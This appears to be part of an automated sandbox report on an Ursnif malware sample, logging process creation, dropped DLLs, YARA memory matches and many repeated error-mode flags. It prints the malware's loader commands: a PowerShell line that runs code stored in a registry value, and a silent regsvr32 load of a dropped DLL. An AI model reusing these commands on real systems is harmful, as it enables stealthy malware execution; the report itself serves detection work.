                  Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

                  Data Obfuscation:

                  barindex
                  Suspicious powershell command line foundShow sources
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E7A60 push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E7DCF push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB7A60 push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB7DCF push ecx; ret
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dllJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\Documents\decrypt.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
                  Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
